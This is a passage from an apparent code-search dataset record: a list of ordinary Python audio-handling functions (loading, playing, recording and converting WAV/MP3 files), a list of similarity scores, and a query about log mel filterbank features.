*samples)", "def play(self):\n assert pyaudio is not None, (\"You need to have pyaudio installed to \"\n \"use the play_wav function\")\n filename = os.path.join(tempfile.gettempdir(),\n '6003_wave_%s.wav' % abs(hash(tuple(self.samples))))\n self.save(filename)\n f = wave.open(filename, 'r')\n try:\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(),\n rate=f.getframerate(),\n output=True)\n\n data = f.readframes(10240)\n while data:\n stream.write(data)\n data = f.readframes(10240)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n finally:\n f.close()\n os.unlink(filename)", "def decode_audio(fp, fs=None, mono=False, normalize=False, fastwav=False, measured = False):\n if measured:\n fp = fp.decode('latin').replace(\"clean\", \"measured\")\n\n if fastwav:\n # Read with scipy wavread (fast).\n _fs, _wav = wavread(fp)\n if fs is not None and fs != _fs:\n raise NotImplementedError('Fastwav cannot resample audio.')\n if _wav.dtype == np.int16:\n _wav = _wav.astype(np.float32)\n _wav /= 32768.\n elif _wav.dtype == np.float32:\n pass\n else:\n raise NotImplementedError('Fastwav cannot process atypical WAV files.')\n else:\n # TODO: librosa currently optional due to issue with cluster installation\n import librosa\n # Decode with librosa load (slow but supports file formats like mp3).\n _wav, _fs = librosa.core.load(fp, sr=fs, mono=False)\n if _wav.ndim == 2:\n _wav = np.swapaxes(_wav, 0, 1)\n\n assert _wav.dtype == np.float32\n\n # At this point, _wav is np.float32 either [nsamps,] or [nsamps, nch].\n # We want [nsamps, 1, nch] to mimic 2D shape of spectral feats.\n if _wav.ndim == 1:\n nsamps = _wav.shape[0]\n nch = 1\n else:\n nsamps, nch = _wav.shape\n _wav = np.reshape(_wav, [nsamps, 1, nch])\n \n # Average channels if we want monaural audio.\n if mono:\n _wav = np.mean(_wav, 2, keepdims=True)\n\n if normalize:\n _wav /= np.max(np.abs(_wav))\n\n return _wav", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=None, mono=True)", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def read_wav_file(wave_file):\n return wavfile.read(wave_file)", "def do_play(*_args):\n print(last_wav_path)\n if last_wav_path and last_wav_path.is_file():\n threading.Thread(\n target=lambda: subprocess.check_call(\n [\"aplay\", \"-q\", str(last_wav_path)]\n )\n ).start()", "def get_audio(filepath, restrict=restrict_range, use_librosa=False, normalize=True):\n try:\n audio, fs = librosa.load(path=filepath, sr=22050)\n except Exception as e:\n fs, audio_ro = scipy.io.wavfile.read(filepath)\n audio = np.copy(audio_ro) / 32767\n if fs != 22050:\n print(\"incorrect fs\")\n return None\n # frame-wise calculation\n if restrict:\n start = start_sec * fs\n end = end_sec * fs\n audio = np.array(audio[start:end], dtype=np.float32)\n if normalize is True:\n audio = (cqt_params['normalizing_constant'] * audio) / np.std(audio[np.abs(audio > 0.00001)])\n return audio", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "async def audiofiles(self, ctx):\r\n files = '\"{0}\"'.format('\", \"'.join(self.audio_files))\r\n await ctx.send(\"```Available audio files :\\n{0}```\".format(files))", "def get_audio(path):\n return send_from_directory('audio', path)", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n stream.stop_stream()\n stream.close()", "def wavplay(filename):\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\tprint(\"Input file does not exist. Make sure you computed the analysis/synthesis\")\n\telse:\n\t\tif sys.platform == \"linux\" or sys.platform == \"linux2\":\n\t\t # linux\n\t\t subprocess.call([\"aplay\", filename])\n\n\t\telif sys.platform == \"darwin\":\n\t\t\t# OS X\n\t\t\tsubprocess.call([\"afplay\", filename])\n\t\telse:\n\t\t\tprint(\"Platform not recognized\")", "def handle_play(self, message):\n self.audio_service.resume()", "def extract(path, quality=\"medium\"):\n\n try:\n file = ffmpeg.input(path)\n output_path = path[:-3] + \"ogg\"\n if os.path.exists(output_path):\n print(\n f\"[{colored('#','yellow')}] Audio file {colored(path2title(output_path),'green')} already exists\"\n )\n return output_path\n print(\n f\"\\n[{colored('+','green')}] Extracting audio for file %s\"\n % (colored(path2title(path), \"green\")),\n end=\"\",\n )\n from util import Animation\n\n anim = Animation()\n file.audio.output(\n output_path,\n acodec=\"libvorbis\",\n audio_bitrate=BITRATE * get_multiplier(quality),\n loglevel=0,\n ).run()\n anim.complete()\n print(\n f\"[{colored('+','green')}] Extraction completed for file %s\"\n % (colored(path2title(output_path), \"green\"))\n )\n\n except Exception as ex:\n print(\n f\"[{colored('-','red')}] There was an error extracting the audio for path {colored(path2title(output_path),'green')}: \",\n ex,\n )\n sys.exit(-1)\n\n return output_path", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. \"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def getAudio(self):\n audioString = self.inStream.read(self.BUFFERSIZE)\n self.newAudio = True\n return numpy.fromstring(audioString, dtype=numpy.int16)", "def parse_raw(data):\n for sample in data:\n assert \"src\" in sample\n json_line = sample[\"src\"]\n obj = json.loads(json_line)\n assert \"key\" in obj\n assert \"wav\" in obj\n assert \"txt\" in obj\n key = AishellKeyMapper.encode(obj[\"key\"])\n wav_file = obj[\"wav\"]\n txt = obj[\"txt\"]\n try:\n if \"start\" in obj:\n assert \"end\" in obj\n sample_rate = torchaudio.backend.sox_io_backend.info(wav_file).sample_rate\n start_frame = int(obj[\"start\"] * sample_rate)\n end_frame = int(obj[\"end\"] * sample_rate)\n waveform, _ = torchaudio.backend.sox_io_backend.load(\n filepath=wav_file, num_frames=end_frame - start_frame, frame_offset=start_frame\n )\n else:\n waveform, sample_rate = torchaudio.load(wav_file)\n example = dict(key=key, txt=txt, wav=waveform, sample_rate=sample_rate)\n yield example\n except Exception as ex:\n logging.warning(\"Failed to read {}\".format(wav_file))", "def load_mp3(path):\r\n data, fs = librosa.core.load(path, sr=None)\r\n\r\n return fs, data", "def get_data(path):\n if path.endswith('.mp3'):\n path = prepare_file(path, path.rstrip('mp3')+'wav')\n x, sr = librosa.load(path, duration=30)\n\n else:\n x, sr = librosa.load(path, duration=30)\n directory, file_name = os.path.split(path)\n return x, sr, file_name", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def extract_audio(file_name, audio_directory):\n basename = os.path.splitext(os.path.basename(file_name))[0]\n audio_file_name = audio_directory + '/' + basename + '.wav'\n subprocess.call(['ffmpeg', '-y', '-i', file_name, '-ac', '1', audio_file_name])\n return audio_file_name", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def read(self, path):\n pbase = os.path.splitext(path)[0]\n gsid = pbase.split('/')[-2]\n gender, sid = gsid[0], gsid[1:]\n assert sid in self._spkr_table\n phoneseq = phnread(pbase+'.PHN')\n wrdseq = phnread(pbase+'.WRD')\n transcrpt = txtread(pbase+'.TXT')\n sample = TIMITSpeech(\n *audioread(path), speaker=sid, gender=gender,\n transcript=transcrpt, phonemeseq=phoneseq,\n wordseq=wrdseq\n )\n #sample.phonemeseq = [\n # (t, PHONETABLE[p]) for t, p in sample.phonemeseq]\n return sample", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def _read_data_into_packet(self, p):\n\n length = p.length * self.disc.audio_format.bytes_per_frame\n\n if p.file_pos is None:\n # Silence, so send on null bytes to player\n p.data = '\\0' * length\n\n else:\n file_pos = p.file_pos * self.disc.audio_format.bytes_per_frame\n self.audio_file.seek(file_pos)\n\n p.data = self.audio_file.read(length)\n length -= len(p.data)\n file_pos += len(p.data)\n\n # If we didn't get all data, iterate with a timeout until\n # it's all been read or the ripping process has stopped.\n # This is not very efficient, and there's a small race\n # condition at the end of the disc, but this should be\n # very rare so keep it unoptimised for now.\n\n while length > 0 and self.is_ripping and self.is_ripping.is_set():\n time.sleep(1)\n\n self.audio_file.seek(file_pos)\n d = self.audio_file.read(length)\n\n length -= len(d)\n file_pos += len(d)\n\n p.data += d\n\n # Still didn't get all data, treat it as an exception\n if length > 0:\n raise SourceError('unexpected end of file, expected at least {0} bytes'\n .format(length))", "def load_audio(fhandle: BinaryIO, sr=None) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=sr, mono=True)\n return audio, sr", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def load_audio(self):\n\n self.audio_file = tkFileDialog.askopenfilename()\n self.audio_parser = AudioFileParser(self.audio_file)\n\n self.audio_entries = self.audio_parser.entries\n\n for index, entry in enumerate(self.audio_parser.entries):\n self.audio_box.insert(index, entry.word)", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def run(self) -> None:\n self._running = True\n while self._running:\n self._ist_mut.acquire()\n self.buff = np.zeros(params.BUF)\n for i in self.ist:\n self.buff += np.asarray(struct.unpack('f'*params.BUF, i.read(params.BUF)))\n self.buff /= len(self.ist)\n self._ist_mut.release()\n self.buff = self.transf.apply_all(self.buff)\n self._sou_mut.acquire()\n dels = []\n for i, s in enumerate(self.sounds):\n so_raw = s.read(params.BUF)\n if so_raw == b'':\n dels.append(i)\n continue\n so = np.asarray(struct.unpack(s.format*(len(so_raw)//s.f_size), so_raw)).astype(np.float32)\n so /= 2**(8*s.f_size-1)\n so = np.hstack((so, np.zeros(params.BUF-len(so))))*s.amp\n self.buff = np.average([self.buff, so], axis=0, weights=[.8,.2])\n for d in reversed(dels):\n del self.sounds[d]\n self._sou_mut.release()\n raw = struct.pack('f'*len(self.buff), *self.buff)\n self._ost_mut.acquire()\n for o in self.ost:\n o.write(raw)\n self._ost_mut.release()", "def read_audio_from_stream(stream, sr=None, mono=False, duration=None, exp_format=\"wav\"):\n _, file_ext = stream.filename.rsplit('.', 1)\n ext_converter = {\n 'mp3': AudioSegment.from_mp3,\n }\n converter = ext_converter.get(file_ext)\n if not converter:\n raise InvalidUsage(f\"Invalid extension: {file_ext}\")\n\n with tempfile.NamedTemporaryFile() as ntf:\n sound = converter(stream)\n sound.export(ntf, format=exp_format)\n return read_audio(ntf.name, sr, mono, duration)", "async def transcribe_wav(args: argparse.Namespace, core: Voice2JsonCore) -> None:\n from rhasspyasr import Transcription\n\n # Make sure profile has been trained\n assert core.check_trained(), \"Not trained\"\n\n # Get speech to text transcriber for profile\n transcriber = core.get_transcriber(open_transcription=args.open, debug=args.debug)\n\n # Directory to report WAV file names relative to\n relative_dir = (\n None if args.relative_directory is None else Path(args.relative_directory)\n )\n\n try:\n if args.wav_file or args.stdin_files:\n # Read WAV file paths\n wav_files = args.wav_file\n if args.stdin_files:\n _LOGGER.debug(\"Reading file paths from stdin\")\n wav_files = itertools.chain(wav_files, sys.stdin)\n\n for wav_path_str in wav_files:\n wav_path_str = wav_path_str.strip()\n\n # Load and convert\n wav_path = Path(wav_path_str)\n _LOGGER.debug(\"Transcribing %s\", wav_path)\n\n wav_data = await core.maybe_convert_wav(wav_path.read_bytes())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n if relative_dir is None:\n # Add name of WAV file to result\n result[\"wav_name\"] = wav_path.name\n else:\n # Make relative to some directory\n result[\"wav_name\"] = str(\n wav_path.absolute().relative_to(relative_dir.absolute())\n )\n\n print_json(result)\n else:\n # Read WAV data from stdin\n _LOGGER.debug(\"Reading WAV data from stdin\")\n\n if args.input_size:\n # Number of bytes is on separate line\n line = sys.stdin.buffer.readline().strip()\n if not line:\n return\n\n num_bytes = int(line)\n while num_bytes > 0:\n # Read in WAV\n wav_data = sys.stdin.buffer.read(num_bytes)\n while len(wav_data) < num_bytes:\n wav_data = sys.stdin.buffer.read(num_bytes - len(wav_data))\n\n # Transcribe\n wav_data = await core.maybe_convert_wav(wav_data)\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n\n # Next WAV\n line = sys.stdin.buffer.readline().strip()\n if not line:\n break\n\n num_bytes = int(line)\n else:\n # Load and convert entire input\n wav_data = await core.maybe_convert_wav(sys.stdin.buffer.read())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n finally:\n transcriber.stop()", "def single_analyze_wav(self, filePath):\n\n tChopped, vChopped, fVals,\\\n powerFFT, peakFreqs, peakAmps = Utils.AnalyzeFFT(filePath, tChop=self.settings['processing']['tChop'],\n detail=self.settings['processing']['detail'])\n\n self.analyzeDone.emit(tChopped, vChopped, fVals, powerFFT, peakFreqs, peakAmps, filePath)\n self.update_table(peakFreqs, peakAmps)", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def read_audio_from_path(path: str) ->Optional[TorchAudioTuple]:\n bytes_obj = get_bytes_obj_from_path(path)\n return read_audio_from_bytes_obj(bytes_obj)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def read(filename):\n\n fileName, fileExtension = os.path.splitext(filename)\n wav_filename = filename\n rate, data = scipy.io.wavfile.read(str(wav_filename)) # the data is read in its native format\n if data.dtype =='int16':\n data = numpy.cast['float'](data)\n return [rate,data]", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def process_sound_map():\n pass", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def _process_audio(self, root: str, id: str) -> bool:\n path = os.path.join(root, id + \".flac\")\n si, _ = torchaudio.info(path)\n duration = (si.length / si.channels) / si.rate\n if self.max_duration is not None and duration > self.max_duration:\n return True\n self.paths.append(path)\n self.durations.append(duration)\n return False", "def play_prog(self):\r\n\r\n serial_number = range(47845, 47869)\r\n chord_number = range(1, 25)\r\n for i in self.cnv:\r\n # Look for matching audio files and play them.\r\n try:\r\n filename = \"audio files/{}__{}.wav\".format(serial_number[i-1], chord_number[i-1])\r\n playsound.playsound(filename)\r\n except FileNotFoundError:\r\n print('Error: audio files not found.')", "def _record_audio(self) -> io.BytesIO:\n frames = io.BytesIO()\n audio_stream = self.audio_interface.open(\n channels=self.channels,\n format=self.SAMPLE_FORMAT,\n frames_per_buffer=self.chunk_size,\n input=True,\n rate=self.framerate,\n stream_callback=functools.partial(\n self._fill_audio_buffer,\n frames))\n\n while audio_stream.is_active():\n pass\n\n audio_stream.stop_stream()\n audio_stream.close()\n\n return frames" ]
[ "0.72694874", "0.7045707", "0.6956398", "0.6821181", "0.6742061", "0.6704527", "0.6699321", "0.6644113", "0.6615665", "0.64650714", "0.6453779", "0.63955903", "0.63811314", "0.63749427", "0.6367572", "0.63429946", "0.6340871", "0.633396", "0.6314544", "0.6308602", "0.6294938", "0.6285965", "0.62740135", "0.62489915", "0.623837", "0.6233427", "0.62217736", "0.6196891", "0.618415", "0.6141494", "0.6132818", "0.61327016", "0.6072964", "0.60648024", "0.6053477", "0.6053171", "0.604283", "0.6034881", "0.6016926", "0.6007087", "0.600231", "0.6001837", "0.59928614", "0.5991923", "0.5990197", "0.59824836", "0.5970262", "0.5936505", "0.5935647", "0.5932384", "0.59256643", "0.59164584", "0.5911463", "0.59061843", "0.58888954", "0.588063", "0.5877161", "0.5876366", "0.58651054", "0.5862576", "0.58527976", "0.5828484", "0.5814212", "0.580452", "0.5789877", "0.5788685", "0.5775275", "0.5768632", "0.5764965", "0.5760695", "0.5758041", "0.5740839", "0.5739856", "0.57366556", "0.57348984", "0.57348984", "0.5731569", "0.5728181", "0.57270306", "0.57072973", "0.56976074", "0.5685951", "0.56839347", "0.568042", "0.5676626", "0.56749207", "0.5664367", "0.5664219", "0.5659049", "0.56504446", "0.5648043", "0.5646563", "0.56454086", "0.5641915", "0.56326896", "0.56307846", "0.56233025", "0.5617952", "0.56137264", "0.5613083", "0.5612471" ]
0.0
-1
Compute log mel filterbank features with deltas and double deltas
